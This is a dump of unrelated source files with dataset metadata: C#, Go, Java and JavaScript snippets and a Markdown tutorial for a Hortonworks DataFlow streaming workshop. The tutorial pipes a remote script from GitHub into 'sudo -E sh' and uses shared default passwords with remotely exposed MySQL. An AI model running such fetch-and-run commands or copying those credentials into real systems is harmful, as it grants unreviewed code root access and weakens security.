public void UpdatePosition(Point currentPoisition, Point previousePosition, PaintingObject paintingObject)
{
var move = new Point(currentPoisition.X - previousePosition.X, currentPoisition.Y - previousePosition.Y);
paintingObject.UpdatePosition(move);
}
public bool IsMovingObject()
{
return SelectedObject != null && !SelectedObject.IsBeingCreated;
}
public void BeginPreview(PaintingObject paintingObject)
{
MemoryManager.Add(paintingObject);
SelectedObject = paintingObject;
}
public void EndPreview()
{
SelectedObject.IsBeingCreated = false;
SelectedObject = null;
}
public void BeginPreview(Point mousePosition)
{
if (IsGrabTool()) SetSelectedObject(mousePosition);
else
BeginDrawing(mousePosition);
}
private void SetSelectedObject(Point mousePosition)
{
SelectedObject = MemoryManager.GetObjectOnPosition(mousePosition);
}
private void BeginDrawing(Point mousePosition)
{
var paintingObject = SelectedTool.PaintingObject.GetInstance(mousePosition, SelecedColorContainer);
BeginPreview(paintingObject);
}
private bool IsGrabTool()
{
return SelectedTool is GrabTool;
}
public void SetSelectedColor(Color color)
{
//k jine sirce staci upravit pen size
SelecedColorContainer = new ColorContainer(new SolidBrush(color), new Pen(color), color);
}
}
}
|
Go
|
UTF-8
| 1,169 | 2.515625 | 3 |
[
"MIT"
] |
permissive
|
// See swaybar-protocol(7).
package swaybar
// Header represents a swaybar-protocol header.
type Header struct {
Version int
ClickEvents bool
ContSignal int
StopSignal int
}
// Body represents a swaybar-protocol body.
type Body struct {
StatusLines []StatusLine
}
// StatusLine is a slice of Blocks representing a complete swaybar statusline.
type StatusLine struct {
Blocks []Block
}
// Block represents a single item in a StatusLine.
type Block struct {
FullText string
ShortText string
Color string
Background string
Border string
BorderTop int
BorderBottom int
BorderLeft int
BorderRight int
MinWidth int
Align string
Name string
Instance string
Urgent bool
Separator bool
SeparatorBlockWidth int
Markup string
}
// ClickEvent represents a swaybar-protocol click event.
type ClickEvent struct {
Name string
Instance string
X int
Y int
Button int
Event int
RelativeX int
RelativeY int
Width int
Height int
}
|
Java
|
UTF-8
| 611 | 2.796875 | 3 |
[] |
no_license
|
package com.github.peckb1.projecteuler.p011to020;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import java.time.LocalDate;
import java.time.Month;
public class Problem19Test {
private Problem19 problem19;
@Before
public void setUp() throws Exception {
this.problem19 = new Problem19();
}
@Test
public void testProblem19() throws Exception {
LocalDate start = LocalDate.of(1901, Month.JANUARY, 1);
LocalDate end = LocalDate.of(2001, Month.JANUARY, 1);
Assert.assertEquals(171, this.problem19.sundays(start, end));
}
}
|
Java
|
UTF-8
| 15,995 | 1.859375 | 2 |
[
"MIT"
] |
permissive
|
package cn.liangyongxiong.cordova.plugin.admob.tencent;
import android.app.Activity;
import android.app.FragmentManager;
import android.app.FragmentTransaction;
import android.text.TextUtils;
import android.view.ViewGroup;
import android.widget.RelativeLayout;
import android.util.Log;
import com.qq.e.ads.nativ.NativeAD;
import com.qq.e.ads.nativ.NativeADDataRef;
import com.qq.e.comm.util.AdError;
import org.apache.cordova.CallbackContext;
import org.apache.cordova.CordovaPlugin;
import org.apache.cordova.PluginResult;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import java.util.ArrayList;
import java.util.List;
public class TencentAdMob extends CordovaPlugin {
public static final String TAG = TencentAdMob.class.getSimpleName();
private RelativeLayout bottomView, contentView;
private static final int BOTTOM_VIEW_ID = 0x1;
private TencentAdMobBannerFragment bannerFragment;
private TencentAdMobInterstitialFragment interstitialFragment;
@Override
public boolean execute(String action, JSONArray args, final CallbackContext callbackContext) throws JSONException {
final Activity activity = this.cordova.getActivity();
if (action.equals("showBannerAd")) {
String content = args.getString(0);
JSONObject object = new JSONObject(content);
final String app = object.getString("app");
final String position = object.getString("position");
final int close = object.getInt("close");
final int interval = object.getInt("interval");
final String align = object.optString("align");
activity.runOnUiThread(new Runnable() {
public void run() {
bottomView = new RelativeLayout(activity);
RelativeLayout.LayoutParams params = new RelativeLayout.LayoutParams(
RelativeLayout.LayoutParams.MATCH_PARENT,
RelativeLayout.LayoutParams.WRAP_CONTENT
);
if (align.equalsIgnoreCase("top")) {
params.addRule(RelativeLayout.ALIGN_PARENT_TOP);
} else {
params.addRule(RelativeLayout.ALIGN_PARENT_BOTTOM);
}
params.addRule(RelativeLayout.CENTER_HORIZONTAL);
bottomView.setLayoutParams(params);//底部容器
bottomView.setId(BOTTOM_VIEW_ID);
contentView = new RelativeLayout(activity);
contentView.addView(bottomView);
activity.addContentView(contentView, new RelativeLayout.LayoutParams(
RelativeLayout.LayoutParams.MATCH_PARENT,
RelativeLayout.LayoutParams.MATCH_PARENT));
FragmentManager fm = activity.getFragmentManager();
FragmentTransaction ft = fm.beginTransaction();
bannerFragment = TencentAdMobBannerFragment.newInstance(app, position, close, interval);
bannerFragment.setCallbackContext(callbackContext);
ft.replace(BOTTOM_VIEW_ID, bannerFragment);
ft.commitAllowingStateLoss();
}
});
} else if (action.equals("hideBannerAd")) {
activity.runOnUiThread(new Runnable() {
@Override
public void run() {
if (bannerFragment != null) {
try {
JSONObject obj = new JSONObject();
obj.put("type", "onClose");
sendUpdate(bannerFragment.callbackContext, obj, false);
} catch (Exception e) {
}
FragmentManager fm = activity.getFragmentManager();
FragmentTransaction ft = fm.beginTransaction();
ft.remove(bannerFragment);
ft.commitAllowingStateLoss();
}
ViewGroup group = activity.findViewById(android.R.id.content);
if (group != null) {
group.removeView(contentView);
}
}
});
} else if (action.equals("showInterstitialAd")) {
String content = args.getString(0);
JSONObject object = new JSONObject(content);
final String app = object.getString("app");
final String position = object.getString("position");
final int popup = object.getInt("popup"); // 0:show | 1:showPopup
activity.runOnUiThread(new Runnable() {
@Override
public void run() {
FragmentManager fm = activity.getFragmentManager();
FragmentTransaction ft = fm.beginTransaction();
interstitialFragment = TencentAdMobInterstitialFragment.newInstance(app, position, popup);
interstitialFragment.setCallbackContext(callbackContext);
ft.add(interstitialFragment, TencentAdMobInterstitialFragment.class.getSimpleName());
ft.commitAllowingStateLoss();
}
});
} else if (action.equals("hideInterstitialAd")) {
//关闭
activity.runOnUiThread(new Runnable() {
@Override
public void run() {
FragmentManager fm = activity.getFragmentManager();
String tag = TencentAdMobInterstitialFragment.class.getSimpleName();
TencentAdMobInterstitialFragment fragment = (TencentAdMobInterstitialFragment) fm.findFragmentByTag(tag);
if (fragment != null) {
fragment.finishFragment();
}
}
});
} else if (action.equals("showSplashAd")) {
String content = args.getString(0);
JSONObject object = new JSONObject(content);
final String app = object.getString("app");
final String position = object.getString("position");
final int delay = object.getInt("delay");
JSONObject bottom = object.getJSONObject("bottom");
final String image = bottom.getString("image");
final int height = bottom.getInt("height");
activity.runOnUiThread(new Runnable() {
@Override
public void run() {
FragmentManager fm = activity.getFragmentManager();
FragmentTransaction ft = fm.beginTransaction();
TencentAdMobSplashFragment fragment = TencentAdMobSplashFragment.newInstance(app, position, delay, image, height);
fragment.setCallbackContext(callbackContext);
ft.add(fragment, TencentAdMobSplashFragment.class.getSimpleName());
ft.commitAllowingStateLoss();
}
});
} else if (action.equals("loadNativeAd")) {
String content = args.getString(0);
JSONObject object = new JSONObject(content);
final String app = object.getString("app");
final String position = object.getString("position");
final int count = object.getInt("count");
try {
activity.runOnUiThread(new Runnable() {
NativeAD nativeAD;
@Override
public void run() {
loadAD(count);
}
//初始化并加载广告
public void loadAD(int count) {
if (nativeAD == null) {
this.nativeAD = new NativeAD(activity,
app, position,
new NativeAD.NativeAdListener() {
@Override
public void onADLoaded(List<NativeADDataRef> list) {
int size = list.size();
JSONArray array = new JSONArray();
try {
for (int i = 0; i < size; i++) {
JSONObject obj = new JSONObject();
NativeADDataRef nativeADDataRef = list.get(i);
String title = nativeADDataRef.getTitle();
String icon = nativeADDataRef.getIconUrl();
String img = nativeADDataRef.getImgUrl();
String desc = nativeADDataRef.getDesc();
ArrayList<String> imgs = (ArrayList<String>) nativeADDataRef.getImgList();
if (!TextUtils.isEmpty(title)) {
obj.put("title", title);
} else {
obj.put("title", "");
}
if (!TextUtils.isEmpty(icon)) {
obj.put("icon", icon);
} else {
obj.put("icon", "");
}
if (!TextUtils.isEmpty(img)) {
obj.put("img", img);
} else {
obj.put("img", "");
}
if (!TextUtils.isEmpty(desc)) {
obj.put("desc", desc);
} else {
obj.put("desc", "");
}
if (imgs != null && imgs.size() > 0) {
JSONArray arr = new JSONArray();
for (int j = 0; j < imgs.size(); i++) {
arr.put(imgs.get(j));
}
obj.put("imgs", arr.toString());
} else {
obj.put("imgs", new JSONArray().toString());
}
String score = String.valueOf(nativeADDataRef.getAPPScore());
double p = (double) (nativeADDataRef.getAPPPrice());
String price = String.valueOf(p);
if (TextUtils.isEmpty(score) || !TextUtils.isDigitsOnly(score)) {
obj.put("score", 0);
} else {
obj.put("score", Integer.parseInt(score));
}
if (TextUtils.isEmpty(price)) {
obj.put("price", (double) 0);
} else {
if (Double.isInfinite(p) || Double.isNaN(p)) {
obj.put("price", (double) 0);
} else {
obj.put("price", p);
}
}
array.put(obj);
}
JSONObject adsJsonObject = new JSONObject();
adsJsonObject.put("ads", array);
adsJsonObject.put("type", "onSuccess");
sendUpdate(callbackContext, adsJsonObject, false);
} catch (Exception e) {
e.printStackTrace();
}
}
@Override
public void onNoAD(AdError error) {
try {
JSONObject obj = new JSONObject();
obj.put("type", "onError");
obj.put("code", error.getErrorCode());
obj.put("msg", error.getErrorMsg());
sendUpdate(callbackContext, obj, false);
} catch (Exception e) {
}
}
@Override
public void onADStatusChanged(NativeADDataRef nativeADDataRef) {
}
@Override
public void onADError(NativeADDataRef nativeADDataRef, AdError error) {
try {
JSONObject obj = new JSONObject();
obj.put("type", "onError");
obj.put("code", error.getErrorCode());
obj.put("msg", error.getErrorMsg());
sendUpdate(callbackContext, obj, false);
} catch (Exception e) {
}
}
});
}
nativeAD.loadAD(count);
}
});
} catch (Exception ex) {
callbackContext.error(0);
}
} else {
return false;
}
return true;
}
private void sendUpdate(CallbackContext callbackContext, JSONObject obj, boolean keepCallback) {
sendUpdate(callbackContext, obj, keepCallback, PluginResult.Status.OK);
}
private void sendUpdate(CallbackContext callbackContext, JSONObject obj, boolean keepCallback, PluginResult.Status status) {
PluginResult result = new PluginResult(status, obj);
result.setKeepCallback(keepCallback);
callbackContext.sendPluginResult(result);
}
}
|
JavaScript
|
UTF-8
| 848 | 3.78125 | 4 |
[] |
no_license
|
// link:https://leetcode.com/problems/rotated-digits/description/
/**
* @param {number} N
* @return {number}
*/
var rotatedDigits = function(N) {
let res = 0;
for (let i = 1; i <= N; ++i) {
if (isGood(i, false)) res++;
}
return res;
};
var isGood = (n, flag) => {
if (n == 0) return flag;
let d = Math.floor(n % 10);
if (d == 3 || d == 4 || d == 7) return false;
if (d == 0 || d == 1 || d == 8) return isGood(Math.floor(n / 10), flag);
return isGood(Math.floor(n / 10), true);
};
// use Set
var rotatedDigits = function(N) {
let res = 0;
for (let i = 1; i <= N; ++i) {
if (isGood(i)) res++;
}
return res;
};
var isGood = n => {
let d = new Set(n+'');
if (d.has('3') || d.has('4') || d.has('7')) return false;
if (!d.has('2') && !d.has('5') && !d.has('6') && !d.has('9')) return false;
return true;
};
|
Markdown
|
UTF-8
| 44,664 | 2.875 | 3 |
[] |
no_license
|
# Streaming-Workshop-with-HDF
# Contents
- [Introduction](#introduction) - Workshop Introduction
- [Use case](#use-case) - Building a 360 view for customers
- [Lab 1](#lab-1) - Cluster installation
- Create an HDF 3.2 cluster
- Access your cluster
- [Lab 2](#lab-2) - Simple flow management
- [Lab 3](#lab-3) - Platform preparation (admin persona)
- Create schemas in Schema Registry
- Create record readers and writters in NiFi
- Create process groups and variables in NiFi
- Create events topics in Kafka
- Create bucket in NiFi Registry
- [Lab 4](#lab-4) - MySQL CDC data ingestion (DataEng persona)
- Configure MySQL to enable binary logs
- Ingest and format data in NiFi
- Store events in ElasticSearch
- Publish update events in Kafka
- [Lab 5](#lab-5) - Version flow in NiFi Registry (DataEng persona)
- [Lab 6](#lab-6) - Logs data collection with MiNiFi(DataEng persona)
- Design MiNiFi pipeline
- Deploy MiNiFi agent
- Deploy MiNiFi pipeline
- Design NiFi pipeline
- [Lab 7](#lab-7) - TODO Fraud detection with Kafka Streams (Dev persona)
- [Lab 7](#lab-7) - TODO Realtime analytics with Kudu/Impala (Analyst persona)
---------------
# Introduction
The objective of this workshop is to build an end to end streaming use case with HDF. This includes edge collection, flow management and stream processing. A focus is also put on governance and best practices using tools such Schema Registry, Flow Registry and Variable Registry. At the end of the workshop, you will understand why HDF is a complete streaming platform that offers entreprise features to build, test and deploy any advanced streaming application. In addition, you will learn details on some of the new features brought by the latest HDF versions:
- Use NiFi to ingest CDC data in real time
- Use Record processors to benefit from improved performance and integration with schema registry
- Route and filter data using SQL
- Version flow developments and propagation from dev to prod
- Integration between NiFi and Kafka to benefit from latest Kafka improvements (transactions, message headers, etc)
- Deploy and use MiNiFi agents
# Use case
In this workshop, we will build a simplified streaming use case for a retail company. We will ingest customer data from MySQL Database and web apps logs from web applications to build a 360 view of a customer in real-time. This data can be stored on modern datastores such as HBase, Kudu or ElasticSearch depending on the use case.
Based on these two data streams, we can implement a fraud detection algorithm in real time. For instance, if a user updates his account (ex postal address) and buys an item that's more expensive than its average purchase, we may decide to investigate. This can be a sign that his account has been hacked and used to buy an expensive item that will be shipped to a new address. The following picture explains the high level architecture of the use case.
For today's lab, we have only 2h30 so we will focus only on the platform and flow management parts. You can come back to this lab later to work on the edge collection, stream processing or analytics parts.

# Lab 1
## Create an HDF 3.2 cluster
For this workshop, we will use a one-node HDF cluster with NiFi, NiFi Registry, Kafka, Storm, Schema Registry and Stream Analytics Manager on AWS. These HDF clusters have been previsioned for you. Follow the instructions below to create your cluster:
- Connect to your AWS account and create a CentOs7 VM with at least 16 GB of RAM (ex: m4.xlarge instance). You can also use any other public or private cloud provider.
- Make sure to add at least 150GB of storage to the VM
- Add tags to your VM as per AWS expense policy : owner, business justification and end date(if applicable)
- Open ports required for the lab : 22 (SSH), 8080 (Ambari), 9090 (NiFi), 7788 (SR), 61080 (NiFi Registry), 3306 (MySQL), 9200 (Elastic)
- Make sure to create and download an SSH key
- Once your VM is ready, SSH to your cluster using your PEM key ``` ssh -i field.pem centos@ip ```
- Launch the cluster install using the following instruction
```
curl -sSL https://raw.githubusercontent.com/ahadjidj/Streaming-Workshop-with-HDF/master/scripts/install_hdf3-2_cluster.sh | sudo -E sh
```
This scripts installs a MySQL Database, ElasticSearch, MiNiFi, Ambari agent and server, HDF MPack and HDF services required for this workshop. Cluster installation will take about 10 minutes.
## Access your Cluster
- Login to Ambari Web UI by opening http://{YOUR_IP}:8080 and log in with **admin/StrongPassword**
- From Ambari, navigate to the different services, check that all services are running and healthy and try to access their UI from the right panel (NiFi, NiFi Registry & SR)
- Connect to the MySQL DB using bash or tools like MySQLWorkbench. A workshop DB has been created for the lab. You have also two users:
- **root/StrongPassword** usable from localhost only
- **workshop/StrongPassword** usable from remote and has full privileges on the workshop DB
# Lab 2 Simple flow management
Great! now that you have your HDF cluster up and running, and that you got familiar with it, let's warm up with a simple NiFi exercise that will help us introduce basic NiFi notions. If you are already familiar with NiFi, you can skip this section and work on Lab 3 directly.
Let's create a simple NiFi flow that watch the /tmp/input directory, and each time a file is present, compresses it, and moves it to /tmp/output. Go to the main canvas of NiFi, locate the add processor button, drag it onto the canvas and release. Explore the list of available processors. You can use the filter bar to search for a particular processor.

Add and configure the following processors:
1. Select the GetFile Processor and add it
1. Configure the GetFile Processor
1. Double-click on the new processor
1. The tabbed dialog should show settings, give the processor a name (ex. Get File From TMP)
1. Select the properties tab
1. Set Input Directory to "/tmp/input" (before doing this use "sudo su nifi" to become the nifi user, and make sure you create this directory on your NiFi box, and that it is owned by the nifi user - chown -R nifi:nifi /tmp/input)
1. Now add an UpdateAttribute processor
1. Configure it with a new dynamic property
1. In the properties tab, press the plus sign in the top right of the dialog
1. Call the property "filename" and set the value to something meaningful
1. Add a property called "mime.type" and set this to "application/gzip"
1. Connect the two processors
1. Hover over the GetFile processor, until the begin connection icon appears
1. Drag this onto the UpdateAttribute processor
1. This brings up the connection configuration dialog
1. For now just leave this on defaults.
1. Add a CompressContent processor and look at its properties, the defaults should work fine here.
1. On settings, make sure you set "Auto-terminate relationships" on for failure
1. Now connect up the output of our UpdateAttributes processor to the new CompressContent
1. Add a PutFile processor
1. Configure the Directory in the PutFile processor properties (nifi will create this directory for you). Note the conflict resolution strategy, and set it to replace.
1. Set both success and failure relationships to auto-terminate in the settings tab
1. Setup the connection between the CompressContent processor and the PutFile processor (only for the success relation!)
Now that you have you first flow completed, select the GetFile processor and press play at the left panel. If you copy a file (for example /var/log/ambari-agent/ambari-agent.log) to the input folder you chose, NiFi will pick it up and send it to the next processor. You can see that there's one flow file in the queue.

To inspect the content of the queue, right click on the queue, list queue, then on the small "i" at the left of the first row. You can see all the details of this flow file, its content if you click on "view" button and it's attributes if you move to the attributes tab. A flow flow is always a content and a list of attributes.

Now start the next processor (UpdateAttribute), and inspect the attributes of the flow file in the next queue. You should see new attributes added by the processor.
Next, start the remaining processor and the flow file will processed by the remaining processors. Notice the statistics of the CompressContent as show below. The size of input data is bigger than output data which shows that our processor is really compressing files. Now check that "/tmp/output" has your file compressed.

Congratulations!! you are now a NiFi flow designer :) note that it's possible to select all the processors (ex. with ctr-A) and start them in a batch. By doing this, your flow will be quickly ingested, compressed and stored in the new location. We did it step by step only to show how NiFi works in slow motion. Test your flow again by copying a new file into /tmp/input. You should see the number of IN and OUT files moves to 2 in all the processors.

Adding processors to the root canvas is not a best practice. Things will get messy very quickly. To organise things, NiFi has an object called a process group (PG). PGs can be used to logically organize your NiFi environment, setup ACLs, reuse code, etc. Process Groups can be created beforehand and processors will be added to them directly. Since we have already added several processors, we can select them (ctr-A), right click on one of them, select 'Group', add a name and click on add. ET voila! We are already ready to tackle advanced topics now.
# Lab 3 Platform preparation (admin persona)
To enforce best practices and governance, there are a few tasks that an admin should do before granting access to the platform. These tasks include:
- Define users, roles and privileges on each tool (SAM, NiFi, Etc)
- Define the schemas of events that we will use. This avoids having developpers using their own schemas which makes applications integration and evolution a real nightmare.
- Define and enforce naming convention that makes it easier to manage applications lifecycle (eg. NiFi PG and processors names)
- Define global variables that should be used to make application migration between environments simple
- etc
In this lab, we will implement some of these best practices to set the right environment for our developpers.
## Create schemas in Schema Registry
In this workshop, we will manipulate three type of events. Go to Schema Registry from Ambari and create the following schemas as shown below:

### Customer events
These events are data coming from the MySQL DB through the CDC layer. Each event has different fields describing the customer (id, first name, last name, etc). To declare this schema, go to Schema Registry and add a new schema with these details:
- Name: customers
- Descrption: schema for CDC events
- Type: Avro Schema Provider
- Schema Group: Kafka
- Compatibility: both
- Evolve: true
For the schema text, use the following Avro description, also available [here](https://raw.githubusercontent.com/ahadjidj/Streaming-Workshop-with-HDF/master/schemas/customers.asvc)
```
{
"type": "record",
"name": "customers",
"fields" : [
{"name": "id", "type": "int"},
{"name": "first_name", "type": ["null", "string"]},
{"name": "last_name", "type": ["null", "string"]},
{"name": "gender", "type": ["null", "string"]},
{"name": "phone", "type": ["null", "string"]},
{"name": "email", "type": ["null", "string"]},
{"name": "countrycode", "type": ["null", "string"]},
{"name": "country", "type": ["null", "string"]},
{"name": "city", "type": ["null", "string"]},
{"name": "state", "type": ["null", "string"]},
{"name": "address", "type": ["null", "string"]},
{"name": "zipcode", "type": ["null", "string"]},
{"name": "ssn", "type": ["null", "string"]},
{"name": "timezone", "type": ["null", "string"]},
{"name": "currency", "type": ["null", "string"]},
{"name": "averagebasket", "type": ["null", "int"]}
]
}
```
### Logs events
These events are data coming from Web Application through the MiNiFi agents deployed on application servers. Each event, describe a customer browsing behavior on a webpage. The provided information is the customer id, the product page being viewed, session duration and if the customer bought the product at the end of the session or not. Go to Schema Registry and add a new schema with these details:
- Name: logs
- Descrption: schema for logs events
- Type: Avro Schema Provider
- Schema Group: Kafka
- Compatibility: both
- Evolve: true
For the schema text, use the following Avro description, also available [here](https://raw.githubusercontent.com/ahadjidj/Streaming-Workshop-with-HDF/master/schemas/logs.asvc)
```
{
"type": "record",
"name": "logs",
"fields" : [
{"name": "id", "type": "int"},
{"name": "product", "type": ["null", "string"]},
{"name": "sessionduration", "type": ["null", "int"]},
{"name": "buy", "type": ["null", "boolean"]},
{"name": "price", "type": ["null", "int"]}
]
}
```
### Logs_view events
We also need another logs event (logs_view) that contain only the product browsing session information with the buy and price fields. We will see why later in the labs. Go to Schema Registry and add a new schema with these details:
- Name: logs_view
- Descrption: schema for logs events
- Type: Avro Schema Provider
- Schema Group: Kafka
- Compatibility: both
- Evolve: true
For the schema text, use the following Avro description:
```
{
"type": "record",
"name": "logs_view",
"fields" : [
{"name": "id", "type": "int"},
{"name": "product", "type": ["null", "string"]},
{"name": "sessionduration", "type": ["null", "int"]}
]
}
```
## Create record readers and writters in NiFi
To use these schema in NiFi, we will leverage record based processors. These processors use record readers and writers to offer improved performances and to use schemas defined globally in a Schema Registry. Our sources (MySQL CDC event and Web App logs) generate data in JSON format so we will need a JSON reader to deserialise data. We will store this data in ElasticSearch and publish it to Kafka. Hence, we need JSON and Avro writers to serialize the data.
To add a reader/writer accessible by all our NiFi flows, click on Configure on the left panel, Controller services and click on "+" button. Note that you can add a Reader/Writter inside a particular process group to isolate them. Readers/Writters created inside a process group will be visible only for processors inside this PG.

### Add a HortonworksSchemaRegistry
Before adding any record reader/writer, we need to add a Schema Registry to tell NiFi where to look for schema definitions. NiFi supports several Schema Registries (Hortonworks, Confluent, NiFi schema registry). Hortonworks Schema registry is a cross tool registry that's integrated with NiFi, Kafka and SAM. Add a HortonworksSchemaRegistry controller to NiFi and configure it with your SR URL as shown below. Once created, make sure to start it by clicking on the lightning icon.


### Add JsonTreeReader
To deserialize JSON data, add a JsonTreeReader and configure it as shown below. Note that the **Schema Access Strategy** is set to **Use 'Schema Name' Property**. This means that flow files going through this serializer must have an attribute **schema.name** that specifies the name of the schema that should be used. Start the Reader by clicking on the lightning icon.

### Add JsonRecordSetWriter
To serialize JSON data for which we have a defined schema, add a JsonRecordSetWriter and configure it as shown below. Start the Writter by clicking on the lightning icon.

### Add AvroRecordSetWriter
Event collected by NiFi will be published to Kafka for further consumption. To prepare data for streaming engine consumption, we need to add AvroRecordSetWriter and set **Schema Write Strategy** to **HWX Content-Encoded Schema Reference** as shown below. Start the Writter by clicking on the lightning icon.

## Create process groups and variables in NiFi
It's critical to organize your flows when you have a shared NiFi instance. NiFi flows can be organized per data sources where each Process Group defines the processing that should be applied to data coming from this source. If you have several flow developers working on different projects, you can assign roles and privileges to each one of them on those process groups. The PG organisation is also useful to declare variables for each source or project and make flow migration from one environment to another one easier.
Add 3 PGs as shown below. Note the naming convention (sourceID_description). It highly recommeneded to use a naming convention to leverage it in flows migration and monitoring.


To add variable to a process group, right click on the process group and then variables.
- SRC1_CDCIngestion: ingest data from MySQL. This PG will use the below variables. For instance, we can change the variable elastic.url from localhost to the production Elastic cluster URL in a central location instead of updating it in every Elastic processor.
```
mysql.driver.location : /usr/share/java/mysql-connector-java.jar
mysql.username : root
mysql.serverid : 123
mysql.host : localhost:3306
source.schema : customers
elastic.url : http://localhost:9200
kafka.url : USE-YOUR-INTERNAL-CLUSTER-ADDRESS:6667 # You can get this address from Ambari config or from the Google Spreadsheet
```

- SRC2_LogsIngestion: ingest data from Web applications. This PG will use the following variables:
```
source.schema : logs
elastic.url : http://localhost:9200
kafka.url : USE-YOUR-INTERNAL-CLUSTER-ADDRESS:6667
```
- Agent1_LogsIngestion: the template that will be deployed in each MiNiFi agent for log ingestion. This PG don't use any variable.
## Create events topics in Kafka
As an admin, we need to provision Kafka topics and define their access policies. Use the following instructions to create the topics that we will use. In the future, topic provisioning will be possible through SMM.
```
/usr/hdf/current/kafka-broker/bin/kafka-topics.sh --zookeeper localhost:2181 --create --topic customers --partitions 1 --replication-factor 1
/usr/hdf/current/kafka-broker/bin/kafka-topics.sh --zookeeper localhost:2181 --create --topic logs --partitions 1 --replication-factor 1
/usr/hdf/current/kafka-broker/bin/kafka-topics.sh --zookeeper localhost:2181 --create --topic alerts --partitions 1 --replication-factor 1
```
## Create events topics in Kafka
As a last step of this lab, let's prepare our NiFi Registry instance. NiFi Registry is a Git like service for your NiFi flow developments. It has flow versionning features that handles the streaming aspect of it: data inflight management, stop/start processors, queue, controller services, etc. Flows are organised in Buckets, which are logical entities that group a set of flows together. A bucket can define a project, an environment, a developper or a team. So let's create a bucket for our lab:
- Go to NiFi Registry on YOUR-CLUSTER-ADDRESS:61080/nifi-registry
- Click on the tool icon at the top right of the UI (settings)
- Click on "New bucket", name it HDF Workshop and click on create

# Lab 4
In this lab, we will use NiFi to ingest CDC data from MySQL. The MySQL DB has a table "customers" that stores information on our customers. We would like to receive each change in the table as an event (insert, update, etc) and use it with other sources to build a customer 360 view in ElasticSearch. The high level flow can be described as follows:

- Ingest events from MySQL (SRC1_CDCMySQL)
- Keep only Insert and Update events and formate them in a usable JSON format (SRC1_RouteSQLVerbe to SRC1_SetSchemaName)
- Insert and update customer data in ElasticSearch where we will build the 360 view (SRC1_MergeRecord to SRC1PutElasticRecord)
- Publish update events in Kafka to use them for fraud detection use case (SRC1_PublishKafkaUpdate)
## Enable MySQL binary logs
NiFi has a native CDC feature for MySQL databases. To use it, the MySQL DB must be configured to use binary logs. Use the following instructions to enable binary logs for the workshop DB and use ROW format CDC events.
```
sudo bash -c 'sudo cat <<EOF >> /etc/my.cnf
server_id = 1
log_bin = delta
binlog_format=row
binlog_do_db = workshop
EOF'
sudo systemctl restart mysqld.service
```
## Ingest and format data in NiFi
In the first step of this lab, we will start by a template that we have prepared for the workshop. Templates is a feature of NiFi that can be used to save, export and import NiFi flows as XML files. Start by doawnloading the template from here and save it as an XML file: https://raw.githubusercontent.com/ahadjidj/Streaming-Workshop-with-HDF/master/scripts/HDF-Workshop-Bootstrap.xml
Go to SRC1_DCIngestion PG, click on the upload template button on the left panel (see below), select the flow template that you have previously downloaded and click on Upload. Once the template is uploaded, ckick on the template button in the top menu, drag it on the canvas and release. Select your template and click add. Several processors have been added to your flow now.

Take some time to open each processor and review its configuration. NiFi has embedded documentation for each processor. If you want to have more information on a particular processor or its parameters, right click on the processor then click on "View Usage".
Note that we are leveraging the variables we defined previously. As you can see in the CaptureChangeMySQL configuration below, we are using variable to set the MySQL configurations rather than setting static configurations. This makes flow versionning, migration and reuse easier.

The yellow "!" icon at the top left of the CDC processor show that the processor is in error state. To investigate the error, put your mouse on the "!" icon and read the error. It says that the processor is using "A Distributed Map Cache Client" that's disabled. We need to enable it to start using the processor.

The CaptureChangeMySQL is a stateful processor. It needs to keep track of information on the latest data ingested: binlog position and transaction ID. To do this, NiFi uses a component called Distributed MapCache service which comes with a client and a server parts. The Distributed MapCache Client is already created and configured for you by the template. However, you need to start it as we saw in the previous paragraph. Also, you need to add a Distributed MapCache Server from the controller services menu and enable it.

We still need to do one last thing before testing our flow. When you use NiFi templates to export/import flows, NiFi protects your passwords and delete them. This means that the password property of the CDC processor is not set. Make sure to update the "Password" property with "StrongPassword".
Now, you can generate some data to see how CDC events look like. Use the following instructions to insert 10 customers to the MySQL DB:
```
curl "https://raw.githubusercontent.com/ahadjidj/Streaming-Workshop-with-HDF/master/scripts/create-customers-table.sql" > "create-customers-table.sql"
mysql -h localhost -u workshop -p"StrongPassword" --database=workshop < create-customers-table.sql
```
Now, select and start the CDC processor: you should get several flow files in the first queue. Start the next processor (RouteOnAttribute) and observe how data is distributed over the different relations. Go to each queue and see how the data looks like for each event. Make sure that you have 10 flow files in "insert,update" relation, 20 in "unmatched" and 1 in "ddl".

To get update events, you can connect to the MySQL DB and update some customer information. You should get 11 flow files in the "insert,update" relation now.
```
mysql -h localhost -u root -pStrongPassword
USE workshop;
UPDATE customers SET phone='0645341234' WHERE id=1;
```
If you right click on the CDC processor, then select "view state", you can see what information the processor is keeping to do the incremental work (see below). During the development phase, it useful to delete the state and make the processor ingest the data again. This avoids touching the database again to get new events. To delete the state of a processor, you need to stop it first. This is a general thing in NiFi: each component needs to be stopped before modifying its configuration.

Now, let's examine what's happening in our flow end-to-end. For teaching purposes, the CDC processor is configured to listen to all events. The Begin/Commit/DDL statements are not useful for us, so we need to filter them with a RouteOnAttribute processor configured as follows:

Each configuration row adds a relation to the processor and defines which flow files should be routed to this relation. We use NiFi [Expression Langage (EL)](https://nifi.apache.org/docs/nifi-docs/html/expression-language-guide.html) to implement our logic. Here, we are comparing the value of the Flow File Attribute "cdc.event.type" with the keywords we are looking for: insert, update, etc. NiFi has a rich expression langage that can be used to work with String, Arithmetic or Logical operators. Here we are using the "equals" function.
The next step of the flow is an EvaluateJsonPath processor that extracts the table name. This processor is used to extract information from the content of the flow file (the JSON document) and adds them as a flow file attribute. This is often required if you want to dynamically extract data that should be in an attribute (routing for instance). Here, we are looking to each JSON file, looking for the field "table_name" and adding it as an attribute called "tableName".

As you can see, each event has a lot of additional information that are not useful for us. The next step is to keep only data of interest and reformat the JSON file to be useful for us. NiFi has several processors that transform data that we can use here. JoltTransformationProcessor is a very powerful transformation processor that can easily do complex transformation on Json data. We use it here with the following Jolt specification.
```
[
{
"operation": "shift",
"spec": {
"columns": {
"*": {
"@(value)": "[#1].@(1,name)"
}
}
}
}
]
```
This Jolt specification is telling NiFi to keep only attributes from the "columns" object, to shift them to the left and keep only "value" and "name" fields as follow:

Now that we have our data in the target Json format, the last processor (UpdateAttribute) is adding an attribute schema.name with the value of the variable ${source.schema} to set the data schema for the upcoming steps (source.schema is set to customers). This prepares our data to be used by the record-based processors, the customers schema that we added in the SR as well as the different record readers/writters.
Once you have a clear understaing of what the template is doing, move to the next step to continue the flow development.
## Store events in ElasticSearch
